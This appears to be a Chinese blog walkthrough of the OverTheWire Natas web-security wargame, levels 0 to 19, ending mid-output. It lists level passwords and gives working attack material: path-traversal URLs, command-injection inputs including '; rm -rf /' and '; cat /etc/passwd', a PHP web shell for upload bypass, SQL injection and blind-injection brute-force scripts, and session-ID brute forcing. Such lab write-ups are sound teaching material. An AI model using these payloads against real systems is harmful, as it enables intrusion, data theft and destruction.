找回密码
 立即注册
首页 业界区 科技 Overthewire :natas Level0~34 完整版 (wargame)

Overthewire :natas Level0~34 完整版 (wargame)

睿哝 前天 10:09
Natas 教授服务器端 Web 安全的基础知识。natas 的每个级别都由自己的网站组成,网址为 http://natasX.natas.labs.overthewire.org,其中 X 是级别编号。 没有 SSH 登录 。要访问某个级别,请输入该级别的用户名(例如,natas0 表示级别 0)及其密码。每个级别都可以访问下一级别的密码。您的工作是以某种方式获取下一个密码并升级。 所有密码也都存储在 /etc/natas_webpass/ 中 。例如,natas5 的密码存储在文件 /etc/natas_webpass/natas5 中,只有 natas4 和 natas5 才能读取。详细参考:https://overthewire.org/wargames/natas/
声明:阅读过程中如遇到相关工具的问题,建议先阅读致谢的预备工作部分。
关卡密码tag/vitalnatas0natas0源码natas10nzCigAq7t2iALyvU9xcHlYN4MlkIwlq禁用右键natas2TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI文件目录natas33gqisGdR0pjm6tpkDKdIWO2hSvchLeYHrobotsnatas4QryZXc2e0zahULdHrtHxzyYkj59kUxLQReferernatas50n35PkggAPm2zbEpOU802c0x0Msn1ToKCookienatas60RoJwHdSKWFTYR5WuiAewauSuNaBXnedincludenatas7bmg8SvU1LizuWjx3y7xkNERkHxGre0GS路径穿越natas8xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q简易加解密natas9ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6tgrep,passthrunatas10t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOupreg_matchnatas11UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk流密码,xornatas12yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB文件上传,rcenatas13trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC同上natas14z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQsql注入natas15SdqIqBsFcz3yotlNYErZSZwblkm0lrvxsql注入布尔盲注natas16hPkjKYviLQctEW33QmuXL6eDVfMW4sGosql注入模糊匹配,爆破natas17EqjHJbo7LFNb8vwhHb9s75hokh5TF0OCSQL注入时间盲注natas186OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJPHPSESSID1,会话劫持natas19tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJrPHPSESSID2,会话劫持natas20p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVywPHPSESSID3,会话劫持natas21BPhv63cKE1lkQl04cE5CuFTzXe15NfiHPHPSESSID4,会话劫持natas22d8rwGBl0Xslg3b76uh3fEbSlnOUBlozzPHPSESSID5,会话劫持natas23dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRsstrstr,phpnatas24MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWdstrcmp,数组绕过natas25ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws综合natas26cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE综合natas27u3RRffXjysjgwFU6b9xa23i6prmUsYnemysqli的varcharnatas281JNwQM1Oi6J6j1k49Xyw7ZN6pXMQInVj加解密,爆破(稍难)natas2931F4j3Qi2PnuhIZQokxXk1L3QT9CppnsPerlnatas30WQhx1BvcmP9irs2MP9tRnLsNaDI76YrHPerlnatas31m7bfjAHpJmSYgQWWeqRE2qVBuMiRNq0yPerlnatas32NaIWhW2VIrKqrc7aroJVHOZvk3RQMi0BPerlnatas33shu5ouSu6eicielahhae0mohd4ui5uig综合natas34综合部分所涉及的知识点较多,这里不仔细打标签,可以自己探索。同组别的题目不打标签,便于实验的连续性和对细节的把握和感悟。
natas0

右键,查看源码,0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq
1.png

natas1

被禁用右键,ctrl-u。TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI
2.png

natas2

3.png

files/pixel.png查看无效。返回上级目录查看。
4.png

查看users.txt,3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH
  1. # username:password
  2. alice:BYNdCesZqW
  3. bob:jw2ueICLvT
  4. charlie:G5vCxkVV3m
  5. natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH
  6. eve:zo4mJWyNj2
  7. mallory:9urtcpzBmH
复制代码
natas3

源代码中有这么一句话,
  1. There is nothing on this page
复制代码
联想到robots协议,它允许一部分爬取,一部分禁止爬取。
构造payloadhttp://natas3.natas.labs.overthewire.org/robots.txt。robots.txt中的内容:

  • User-agent:  * 使规则适用于所有爬虫。
  • Disallow: /s3cr3t/ 禁止爬虫访问 s3cr3t 目录。
    访问http://natas3.natas.labs.overthewire.org/s3cr3t/,只有users.txt文件。于是,
    http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt,得到natas4ryZXc2e0zahULdHrtHxzyYkj59kUxLQ。
natas4

将Referer改为:
方法1:hackbar,0n35PkggAPm2zbEpOU802c0x0Msn1ToK
5.png

方法2:request,0n35PkggAPm2zbEpOU802c0x0Msn1ToK
6.png

源码
  1. import requests
  2. url = "http://natas4.natas.labs.overthewire.org/"
  3. username = "natas4"
  4. # 将以下密码替换为实际获取的natas4密码
  5. password = "QryZXc2e0zahULdHrtHxzyYkj59kUxLQ"
  6. # 必须设置Referer为natas5的URL
  7. headers = {
  8.     "Referer": "http://natas5.natas.labs.overthewire.org/"
  9. }
  10. response = requests.get(
  11.     url,
  12.     auth=requests.auth.HTTPBasicAuth(username, password),
  13.     headers=headers
  14. )
  15. # 发送 GET 请求,进行基本认证,并带上自定义的 Referer 请求头,等同于 response = #requests.get(url, auth=(username, password), headers=headers)
  16. # 提取密码(根据实际页面结构解析)
  17. if response.status_code == 200:
  18.     print("响应内容:")
  19.     print(response.text)
  20.     # 通常密码在页面注释或特定字段中,需根据实际内容提取
  21. else:
  22.     print("请求失败,状态码:", response.status_code)
复制代码
7.png

natas5

登陆后显示Access disallowed. You are not logged in。
登陆标识一般是由Cookie控制的。
1. 什么是 Cookie?

  • Cookie 是存储在用户浏览器中的小文件,用于保存用户的浏览器活动信息,比如偏好设置、登录状态等。
  • 它们由服务器发送并保存在客户端(浏览器)中,然后在每次请求时发送回服务器。
2. Cookie 的工作原理

  • 当用户访问网站时,服务器可以向浏览器发送一个或多个 Cookie。
  • 浏览器将这些 Cookie 存储在本地(通常为文本文件)。
  • 每次用户访问该网站时,浏览器会自动将存储的 Cookie 发送回服务器,以便服务器知道用户的身份或其他信息。
    方法1:开发者模式
    8.png

方法2:python脚本,0RoJwHdSKWFTYR5WuiAewauSuNaBXned
9.png
  1. import requests
  2. url = "http://natas5.natas.labs.overthewire.org/"
  3. username = "natas5"
  4. password = "ORoJwHdSKWFTYRSWuiAewauSuNaBXned"  # 替换为实际natas5密码
  5. # 手动设置Cookie中的loggedin值为1
  6. cookies = {
  7.     "loggedin": "1"
  8. }
  9. response = requests.get(url, auth=(username, password), cookies=cookies)
  10. # 提取密码(根据页面结构解析)
  11. if response.status_code == 200:
  12.     print("响应内容:")
  13.     print(response.text)
  14.     # 密码通常在页面源码的注释或特定标签中,例如:
  15.     # 使用正则提取:Access granted. The password for natas6 is (\w+)
  16. else:
  17.     print(f"请求失败,状态码:{response.status_code}")
复制代码
natas6

代码审计,引入一个外部文件 secret.inc,如果用户提交的post请求与$secret变量相等,就能获取下一关的密码。
10.png

漏洞复现:

  • 这里引入的外部文件 secret.inc,可能包含敏感信息(例如密码或密钥)。


  • 建议:使用绝对路径或相对路径的方式来确保文件存在,避免出现路径遍历漏洞(例如 ../../includes/secret.inc)。

  • $_POST['secret'] 是从用户输入中获取的值,而没有进行任何验证或过滤,直接将其与 $secret 进行比较。这种做法存在风险,尤其是用户输入的数据没有经过消毒处理。若没有正确验证,攻击者可能利用此漏洞进行 跨站脚本攻击(XSS) 或 SQL 注入(假如 $secret 被传入数据库查询时)。


  • 建议:
  • 进行 输入验证 和 过滤,确保 $_POST['secret'] 只包含预期的安全字符。
  • 例如,使用 htmlspecialchars 来避免 XSS 漏洞:
  1. $secret_input = htmlspecialchars($_POST['secret'], ENT_QUOTES, 'UTF-8');
  2. if ($secret == $secret_input) {
  3.     print "Access granted. The password for natas7 is <censored>";
  4. } else {
  5.     print "Wrong secret";
  6. }
复制代码
构造payload http://natas6.natas.labs.overthewire.org/includes/secret.inc
看到
  1. [/code]输入框输入secret的值,bmg8SvU1LizuWjx3y7xkNERkHxGre0GS。
  2. [align=center] 11.png [/align]
  3. [size=6]natas7[/size]
  4. F12查看到,
  5. [align=center] 12.png [/align]
  6. 说密码在那个路径下,直接访问不行。所以想到目录遍历漏洞,构造payload
  7. http://natas7.natas.labs.overthewire.org/index.php?page=../../../../../../../../../../../../../../../.././../../../../../../../../../../../../../../../etc/natas_webpass/natas8
  8. 得到xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q。或者上python脚本
  9. [code]import requests
  10. # 目标URL和认证信息
  11. url = "http://natas7.natas.labs.overthewire.org/index.php"
  12. username = "natas7"
  13. password = "bmg8SvU1LizuWjx3y7xkNERkHxGre0GS"
  14. # 构造路径遍历Payload读取natas8的密码文件
  15. params = {
  16.     "page": "../../../../../../../../../../../../../../../../../../../../../etc/natas_webpass/natas8"
  17. }
  18. # 发送GET请求
  19. response = requests.get(url, auth=(username, password), params=params)
  20. # 提取密码
  21. if response.status_code == 200:
  22.     # 密码通常直接显示在页面内容中
  23.     print("响应内容:")
  24.     print(response.text)
  25.     # 示例提取逻辑(根据实际响应调整):
  26.     # password = response.text.split("\n")[0]
  27.     # print(f"密码:{password}")
  28. else:
  29.     print(f"请求失败,状态码:{response.status_code}")
复制代码
natas8

审计代码
13.png

一个encodeSecret函数,和一个encodedSecret变量。如果传入的secret的值经过简单的base64,字符串反转,2进制转16进制后,所得的值与设定的encodedSecret的变量值相等,就会得到natas9的密码。那么,如何构造这样一个值呢?反过来就行。
漏洞复现:
建议:

  • secret的处理只是简单的编码,建议使用安全的密码算法,如 密码哈希 和 盐值(salt)。例如,可以使用 password_hash 和 password_verify 函数来处理密码。
  1. import base64
  2. # 需要处理的字段
  3. encoded_secret = "3d3d516343746d4d6d6c315669563362"
  4. # 步骤 1: 先将 encodedSecret 转换为2进制
  5. hex_bytes = bytes.fromhex(encoded_secret)
  6. # 步骤 2: 反转字节流(与 PHP 的 strrev 相同)
  7. reversed_bytes = hex_bytes[::-1]
  8. # 步骤 3: 解码 base64
  9. decoded_bytes = base64.b64decode(reversed_bytes)
  10. # 步骤 4: 输出结果
  11. secret = decoded_bytes.decode('utf-8')
  12. print(f"The secret is: {secret}")
复制代码
运行脚本后,The secret is: oubWYf2kBq。提交凭证,会看到Access granted. The password for natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t。
natas9

审计代码,如果key的值存在,就会将needle请求的值赋给key。key的值不为空,就会执行passthru函数中的命令。
14.png

漏洞复现:
对key没有进行充分过滤,如;、|、&&、$(...),会引起命令注入漏洞。 比如,如果用户提供的 needle 是 ; rm -rf /,这将导致服务器上的所有文件被删除。输入 ; cat /etc/passwd,执行cat /etc/passwd后,会泄露系统用户信息。
建议:
限制 $key 的长度,或者仅允许字母和数字。使用正则表达式对输入进行限制:
  1. if (preg_match('/^[a-zA-Z0-9]+$;/', $key)) {
  2.     passthru("grep -i $key dictionary.txt");
  3. } else {
  4.     echo "Invalid input.";
  5. }
复制代码
使用 escapeshellarg() 来对用户输入进行转义,防止恶意命令的注入:
  1. $key = escapeshellarg($_REQUEST['needle']);
  2. passthru("grep -i $key dictionary.txt");
复制代码
输入框输入;cat /etc/natas_webpass/natas10,t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu。
15.png

natas10

增加了对;| &的过滤,
  1. [/code]国际站关于grep的用法。grep 作弊表 |grep 命令行指南
  2. 输入a cat /etc/natas_webpass/natas11,后台会执行grep -i a cat /etc/natas_webpass/natas11 dictionary.txt。grep -i a dictionary.txt会在dictionary.txt中找到包含a和A的单词,cat /etc/natas_webpass/natas11会被grep当作另外一个文件,执行后得到密码UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk。
  3. [align=center] 16.png [/align]
  4. [size=6]natas11[/size]
  5. 代码量明显增多,从后往前找。
  6. [align=center] 17.png [/align]
  7. [indent]$data[ ''showpassword" ]与字符串“yes”相等时,就会打印natas12的密码。
  8. [/indent][indent]这里的$data有两个,一个是调用loadData,一个被传入某个请求。
  9. [/indent][align=center] 18.png [/align]
  10. [indent]loadData的初步分析。
  11. [/indent][align=center] 19.png [/align]
  12. 同natas5一样,查看cookie的参数data,取出HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg%3D,
  13. 转成url码是HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg= 。
  14. 这里的url码就是saveData($data)经过加密后得来的,将其json加密,xor加密,base_64加密,就能得到新的cookie。
  15. 下面用到xor的性质,建议阅读 XOR 教程 。
  16. 我们用原来cookie的url码(密文)和默认文本$defaultdata(明文),xor解码后找到密钥 $key的加长版。判断 $key是 eDWo,将其与默认的 $yesdata文本三层加密后,得到的输出就是我们新的cookie(setcookie)。这个新的cookie,经过yes判断,就获取到natas12的密码。
  17. [code]
复制代码
所以,用新的cookie 值HmYkBwozJw4WNyAAFyB1VUc9MhxHaHUNAic4Awo2dVVHZzEJAyIxCUc5,修改参数data,刷新后,得到yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB。
20.png

natas12

打开界面,看界面就是文件上传,因此暂时不进行代码审计。
写入一句话木马,添加php后缀。
  1. [/code]上传一句话木马之后(需要关闭防火墙),反响是jpg被成功上传。我们想要php格式的文件能够成功执行。于是修改为php后缀,右键重放(Repeater),发送(Send)。
  2. [align=center] 21.png [/align]
  3. 查看响应(Response),发现随机生成了一个php文件。
  4. [align=center] 22.png [/align]
  5. [list=1]
  6. [*]上传上图框住的php文件,查看网页。
  7. [align=center] 23.png [/align]
  8. [/list]警告syetem函数的参数cmd没有传参,导致无法执行命令。
  9. [list=1]
  10. [*]拼接cmd=id,文件所有者,组用户都包含natas12。
  11. [align=center] 24.png [/align]
  12. [*]接着拼接cmd=cat /etc/natas_webpass/natas13,
  13. [align=center] 25.png [/align]
  14. [/list]得到trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC。
  15. 最后,代码审计。
  16. [align=center] 26.png [/align]
  17. [size=6]natas13[/size]
  18. 改写一句话木马。
  19. [code]GIF89a
  20. <?php
  21. system($_GET['cmd']);
  22. ?>
复制代码

  • 上传一句话木马index.php,Proxy抓包,显示
    27.png

  • Repeater篡改,发送
    28.png

  • 传http://natas13.natas.labs.overthewire.org/upload/vdte8q3rgm.php
    29.png

  • 传http://natas13.natas.labs.overthewire.org/upload/vdte8q3rgm.php?cmd=cat%20/etc/natas_webpass/natas13
    30.png

得z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ。
审计代码,与natas12相比,增加几个限制,实际情况①和②都不允许。
31.png

natas14

审计代码,典型的sql注入。
32.png

hackbar添加post请求。
33.png

相当于SELECT * from users where username="" OR 1=1 #&password=,#后面的被注释。前面必有一结果为真,因而成功执行。或者万能密码admin " OR "1"="1,后面password部分必为真,而管理员用户肯定包含admin。所以,得到SdqIqBsFcz3yotlNYErZSZwblkm0lrvx。
natas15

查看前端和源码,前端会有两种相反的返回值(TURE,FLASE),大致判断是盲注。
34.png

布尔盲注的特点是输入SQL语句,前端不会返回任何结果(可能描述不够准确)。这一关的目的是寻找已存在的用户名(natas16)及匹配的密码。因而用模糊匹配写python脚本,这里核心部分参考natas15| Blog。
  1. import requests
  2. url = 'http://natas15.natas.labs.overthewire.org/index.php'
  3. username = 'natas15'
  4. password = 'SdqIqBsFcz3yotlNYErZSZwblkm0lrvx'
  5. key = ''
  6. def main():
  7.     key = ''
  8.     for i in range(0,32):
  9.         for __ in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~@!#{}$%^,&*()_+-":
  10.             data = {'username': f'natas16" and substr((SELECT password FROM users WHERE `username`= "natas16"), {i+1}, 1) = BINARY "{__}" #'}
  11.             #可以替换成参考的payload: data = {'username': 'natas16" and substr((SELECT password FROM users WHERE `username`= "natas16"),'+str(i+1)+',1)= BINARY "' + __ + '" #'}
  12.             print("Now is trying: " + key + __, end = '\r')
  13.             response = requests.post(url,data=data,auth=(username,password))
  14.             #print(response.text)
  15.             if "exists" in response.text:
  16.                 key = key + __
  17.                 break
  18.         print("[+] NextPassword:" + key)
  19. if __name__ == "__main__":
  20.    main()
复制代码
运行结果如下:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo
35.png

natas16

框框里面是过滤的字符,不包括斜杠( / )。
36.png

可以利用没有过滤$的特点编写脚本,
37.png

注意url + data才是我们需要的payload。
得到EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC。
38.png

natas17

请求成功,页面无回显,看样子是时间盲注(timeout)。
39.png

这里的注释印证了上述说法。
40.png

编写脚本,修改data,需要sleep函数来反应,否则难以得到结果。这里调脚本调了好久/(ㄒoㄒ)/~~ ,主要是data的构造和脚本运行时长很长的原因。
41.png

结果如下:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ。
42.png

natas18

审计代码:
  1. <?php
  2. $maxid = 640; // 640 should be enough for everyone
  3. function isValidAdminLogin() { /* {{{ */
  4.     if($_REQUEST["username"] == "admin") {
  5.     /* This method of authentication appears to be unsafe and has been disabled for now. */
  6.         //return 1;
  7.     }
  8.     return 0;
  9. }
  10. /* }}} */
  11. function isValidID($id) { /* {{{ */
  12.     return is_numeric($id);
  13. }
  14. /* }}} */
  15. function createID($user) { /* {{{ */
  16.     global $maxid;
  17.     return rand(1, $maxid);
  18. }
  19. /* }}} */
  20. function debug($msg) { /* {{{ */
  21.     if(array_key_exists("debug", $_GET)) {
  22.         print "DEBUG: $msg<br>";
  23.     }
  24. }
  25. /* }}} */
  26. function my_session_start() { /* {{{ */
  27.     if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
  28.     if(!session_start()) {
  29.         debug("Session start failed");
  30.         return false;
  31.     } else {
  32.         debug("Session start ok");
  33.         if(!array_key_exists("admin", $_SESSION)) {
  34.         debug("Session was old: admin flag set");
  35.         $_SESSION["admin"] = 0; // backwards compatible, secure
  36.         }
  37.         return true;
  38.     }
  39.     }
  40.     return false;
  41. }
  42. /* }}} */
  43. function print_credentials() { /* {{{ */
  44.     if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
  45.     print "You are an admin. The credentials for the next level are:<br>";
  46.     print "<pre>Username: natas19\n";
  47.     print "Password: <censored></pre>";
  48.     } else {
  49.     print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
  50.     }
  51. }
  52. /* }}} */
  53. $showform = true;
  54. if(my_session_start()) {
  55.     print_credentials();
  56.     $showform = false;
  57. } else {
  58.     if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
  59.     session_id(createID($_REQUEST["username"]));
  60.     session_start();
  61.     $_SESSION["admin"] = isValidAdminLogin();
  62.     debug("New session started");
  63.     $showform = false;
  64.     print_credentials();
  65.     }
  66. }
  67. if($showform) {
  68. ?>  
  69.   
  70. <p>  
  71. Please login with your admin account to retrieve credentials for natas19.  
  72. </p>  
  73.   
  74. <form action="index.php" method="POST">  
  75. Username: <input name="username"><br>  
  76. Password: <input name="password"><br>  
  77. <input type="submit" value="Login" />  
  78. </form>  
  79. <?php } 
  80. ?>
复制代码
大致情况如下:
43.png

简单来说,需要一个非法的PHPSESSID种子(cookie),用管理员admin登录(session)。就能显示natas19的密码。
尝试随便输入点什么,果然看到PHPSESSID!
44.png

这个思路应该没错,继续编写脚本。
45.png

结果太长,不截图,以折叠代码的形式出现。
点击查看代码
  1. 运行结果
  2. [+] PHPSESSID= 0nd PHPSESSID......: 0
  3. [+] PHPSESSID= 1nd PHPSESSID......: 1
  4. [+] PHPSESSID= 2nd PHPSESSID......: 2
  5. [+] PHPSESSID= 3nd PHPSESSID......: 3
  6. [+] PHPSESSID= 4nd PHPSESSID......: 4
  7. [+] PHPSESSID= 5nd PHPSESSID......: 5
  8. [+] PHPSESSID= 6nd PHPSESSID......: 6
  9. [+] PHPSESSID= 7nd PHPSESSID......: 7
  10. [+] PHPSESSID= 8nd PHPSESSID......: 8
  11. [+] PHPSESSID= 9nd PHPSESSID......: 9
  12. [+] PHPSESSID= 10d PHPSESSID......: 10
  13. [+] PHPSESSID= 11d PHPSESSID......: 11
  14. [+] PHPSESSID= 12d PHPSESSID......: 12
  15. [+] PHPSESSID= 13d PHPSESSID......: 13
  16. [+] PHPSESSID= 14d PHPSESSID......: 14
  17. [+] PHPSESSID= 15d PHPSESSID......: 15
  18. [+] PHPSESSID= 16d PHPSESSID......: 16
  19. [+] PHPSESSID= 17d PHPSESSID......: 17
  20. [+] PHPSESSID= 18d PHPSESSID......: 18
  21. [+] PHPSESSID= 19d PHPSESSID......: 19
  22. [+] PHPSESSID= 20d PHPSESSID......: 20
  23. [+] PHPSESSID= 21d PHPSESSID......: 21
  24. [+] PHPSESSID= 22d PHPSESSID......: 22
  25. [+] PHPSESSID= 23d PHPSESSID......: 23
  26. [+] PHPSESSID= 24d PHPSESSID......: 24
  27. [+] PHPSESSID= 25d PHPSESSID......: 25
  28. [+] PHPSESSID= 26d PHPSESSID......: 26
  29. [+] PHPSESSID= 27d PHPSESSID......: 27
  30. [+] PHPSESSID= 28d PHPSESSID......: 28
  31. [+] PHPSESSID= 29d PHPSESSID......: 29
  32. [+] PHPSESSID= 30d PHPSESSID......: 30
  33. [+] PHPSESSID= 31d PHPSESSID......: 31
  34. [+] PHPSESSID= 32d PHPSESSID......: 32
  35. [+] PHPSESSID= 33d PHPSESSID......: 33
  36. [+] PHPSESSID= 34d PHPSESSID......: 34
  37. [+] PHPSESSID= 35d PHPSESSID......: 35
  38. [+] PHPSESSID= 36d PHPSESSID......: 36
  39. [+] PHPSESSID= 37d PHPSESSID......: 37
  40. [+] PHPSESSID= 38d PHPSESSID......: 38
  41. [+] PHPSESSID= 39d PHPSESSID......: 39
  42. [+] PHPSESSID= 40d PHPSESSID......: 40
  43. [+] PHPSESSID= 41d PHPSESSID......: 41
  44. [+] PHPSESSID= 42d PHPSESSID......: 42
  45. [+] PHPSESSID= 43d PHPSESSID......: 43
  46. [+] PHPSESSID= 44d PHPSESSID......: 44
  47. [+] PHPSESSID= 45d PHPSESSID......: 45
  48. [+] PHPSESSID= 46d PHPSESSID......: 46
  49. [+] PHPSESSID= 47d PHPSESSID......: 47
  50. [+] PHPSESSID= 48d PHPSESSID......: 48
  51. [+] PHPSESSID= 49d PHPSESSID......: 49
  52. [+] PHPSESSID= 50d PHPSESSID......: 50
  53. [+] PHPSESSID= 51d PHPSESSID......: 51
  54. [+] PHPSESSID= 52d PHPSESSID......: 52
  55. [+] PHPSESSID= 53d PHPSESSID......: 53
  56. [+] PHPSESSID= 54d PHPSESSID......: 54
  57. [+] PHPSESSID= 55d PHPSESSID......: 55
  58. [+] PHPSESSID= 56d PHPSESSID......: 56
  59. [+] PHPSESSID= 57d PHPSESSID......: 57
  60. [+] PHPSESSID= 58d PHPSESSID......: 58
  61. [+] PHPSESSID= 59d PHPSESSID......: 59
  62. [+] PHPSESSID= 60d PHPSESSID......: 60
  63. [+] PHPSESSID= 61d PHPSESSID......: 61
  64. [+] PHPSESSID= 62d PHPSESSID......: 62
  65. [+] PHPSESSID= 63d PHPSESSID......: 63
  66. [+] PHPSESSID= 64d PHPSESSID......: 64
  67. [+] PHPSESSID= 65d PHPSESSID......: 65
  68. [+] PHPSESSID= 66d PHPSESSID......: 66
  69. [+] PHPSESSID= 67d PHPSESSID......: 67
  70. [+] PHPSESSID= 68d PHPSESSID......: 68
  71. [+] PHPSESSID= 69d PHPSESSID......: 69
  72. [+] PHPSESSID= 70d PHPSESSID......: 70
  73. [+] PHPSESSID= 71d PHPSESSID......: 71
  74. [+] PHPSESSID= 72d PHPSESSID......: 72
  75. [+] PHPSESSID= 73d PHPSESSID......: 73
  76. [+] PHPSESSID= 74d PHPSESSID......: 74
  77. [+] PHPSESSID= 75d PHPSESSID......: 75
  78. [+] PHPSESSID= 76d PHPSESSID......: 76
  79. [+] PHPSESSID= 77d PHPSESSID......: 77
  80. [+] PHPSESSID= 78d PHPSESSID......: 78
  81. [+] PHPSESSID= 79d PHPSESSID......: 79
  82. [+] PHPSESSID= 80d PHPSESSID......: 80
  83. [+] PHPSESSID= 81d PHPSESSID......: 81
  84. [+] PHPSESSID= 82d PHPSESSID......: 82
  85. [+] PHPSESSID= 83d PHPSESSID......: 83
  86. [+] PHPSESSID= 84d PHPSESSID......: 84
  87. [+] PHPSESSID= 85d PHPSESSID......: 85
  88. [+] PHPSESSID= 86d PHPSESSID......: 86
  89. [+] PHPSESSID= 87d PHPSESSID......: 87
  90. [+] PHPSESSID= 88d PHPSESSID......: 88
  91. [+] PHPSESSID= 89d PHPSESSID......: 89
  92. [+] PHPSESSID= 90d PHPSESSID......: 90
  93. [+] PHPSESSID= 91d PHPSESSID......: 91
  94. [+] PHPSESSID= 92d PHPSESSID......: 92
  95. [+] PHPSESSID= 93d PHPSESSID......: 93
  96. [+] PHPSESSID= 94d PHPSESSID......: 94
  97. [+] PHPSESSID= 95d PHPSESSID......: 95
  98. [+] PHPSESSID= 96d PHPSESSID......: 96
  99. [+] PHPSESSID= 97d PHPSESSID......: 97
  100. [+] PHPSESSID= 98d PHPSESSID......: 98
  101. [+] PHPSESSID= 99d PHPSESSID......: 99
  102. [+] PHPSESSID= 100 PHPSESSID......: 100
  103. [+] PHPSESSID= 101 PHPSESSID......: 101
  104. [+] PHPSESSID= 102 PHPSESSID......: 102
  105. [+] PHPSESSID= 103 PHPSESSID......: 103
  106. [+] PHPSESSID= 104 PHPSESSID......: 104
  107. [+] PHPSESSID= 105 PHPSESSID......: 105
  108. [+] PHPSESSID= 106 PHPSESSID......: 106
  109. [+] PHPSESSID= 107 PHPSESSID......: 107
  110. [+] PHPSESSID= 108 PHPSESSID......: 108
  111. [+] PHPSESSID= 109 PHPSESSID......: 109
  112. [+] PHPSESSID= 110 PHPSESSID......: 110
  113. [+] PHPSESSID= 111 PHPSESSID......: 111
  114. [+] PHPSESSID= 112 PHPSESSID......: 112
  115. [+] PHPSESSID= 113 PHPSESSID......: 113
  116. [+] PHPSESSID= 114 PHPSESSID......: 114
  117. [+] PHPSESSID= 115 PHPSESSID......: 115
  118. [+] PHPSESSID= 116 PHPSESSID......: 116
  119. [+] PHPSESSID= 117 PHPSESSID......: 117
  120. [+] PHPSESSID= 118 PHPSESSID......: 118
  121. The PHPSESSID with correct password is: 119
复制代码
提交正确的PHPSESSID后,你能够看到:
You are an admin. The credentials for the next level are:
Username: natas19
Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
natas19

随便提交些啥。结果返回,
”You are logged in as a regular user. Login as an admin to retrieve credentials for natas20.“
需要管理员用户。观察到有d,因而需要转十六进制。当然,admin 需要先转成utf8。
[+] PHPSESSID= 0adminPSESSID......: 0admin
[+] PHPSESSID= 1adminPSESSID......: 1admin
[+] PHPSESSID= 2adminPSESSID......: 2admin
46.png

cookie=dict(PHPSESSID=(str(_) + '-admin').encode('utf-8').hex()) 中,-admin 的作用是构造一个特定的会话 ID 格式,目的是通过会话伪造(Session Hijacking)或会话注入(Session Fixation)来模拟管理员权限。-admin是由PSESSID解码后得到的统一标识符。
47.png

运行结果:
点击查看代码
  1. 运行结果
  2. [+] PHPSESSID= 302d61646d696e.....: 302d61646d696e
  3. [+] PHPSESSID= 312d61646d696e.....: 312d61646d696e
  4. [+] PHPSESSID= 322d61646d696e.....: 322d61646d696e
  5. [+] PHPSESSID= 332d61646d696e.....: 332d61646d696e
  6. [+] PHPSESSID= 342d61646d696e.....: 342d61646d696e
  7. [+] PHPSESSID= 352d61646d696e.....: 352d61646d696e
  8. [+] PHPSESSID= 362d61646d696e.....: 362d61646d696e
  9. [+] PHPSESSID= 372d61646d696e.....: 372d61646d696e
  10. [+] PHPSESSID= 382d61646d696e.....: 382d61646d696e
  11. [+] PHPSESSID= 392d61646d696e.....: 392d61646d696e
  12. [+] PHPSESSID= 31302d61646d696e...: 31302d61646d696e
  13. [+] PHPSESSID= 31312d61646d696e...: 31312d61646d696e
  14. [+] PHPSESSID= 31322d61646d696e...: 31322d61646d696e
  15. [+] PHPSESSID= 31332d61646d696e...: 31332d61646d696e
  16. [+] PHPSESSID= 31342d61646d696e...: 31342d61646d696e
  17. [+] PHPSESSID= 31352d61646d696e...: 31352d61646d696e
  18. [+] PHPSESSID= 31362d61646d696e...: 31362d61646d696e
  19. [+] PHPSESSID= 31372d61646d696e...: 31372d61646d696e
  20. [+] PHPSESSID= 31382d61646d696e...: 31382d61646d696e
  21. [+] PHPSESSID= 31392d61646d696e...: 31392d61646d696e
  22. [+] PHPSESSID= 32302d61646d696e...: 32302d61646d696e
  23. [+] PHPSESSID= 32312d61646d696e...: 32312d61646d696e
  24. [+] PHPSESSID= 32322d61646d696e...: 32322d61646d696e
  25. [+] PHPSESSID= 32332d61646d696e...: 32332d61646d696e
  26. [+] PHPSESSID= 32342d61646d696e...: 32342d61646d696e
  27. [+] PHPSESSID= 32352d61646d696e...: 32352d61646d696e
  28. [+] PHPSESSID= 32362d61646d696e...: 32362d61646d696e
  29. [+] PHPSESSID= 32372d61646d696e...: 32372d61646d696e
  30. [+] PHPSESSID= 32382d61646d696e...: 32382d61646d696e
  31. [+] PHPSESSID= 32392d61646d696e...: 32392d61646d696e
  32. [+] PHPSESSID= 33302d61646d696e...: 33302d61646d696e
  33. [+] PHPSESSID= 33312d61646d696e...: 33312d61646d696e
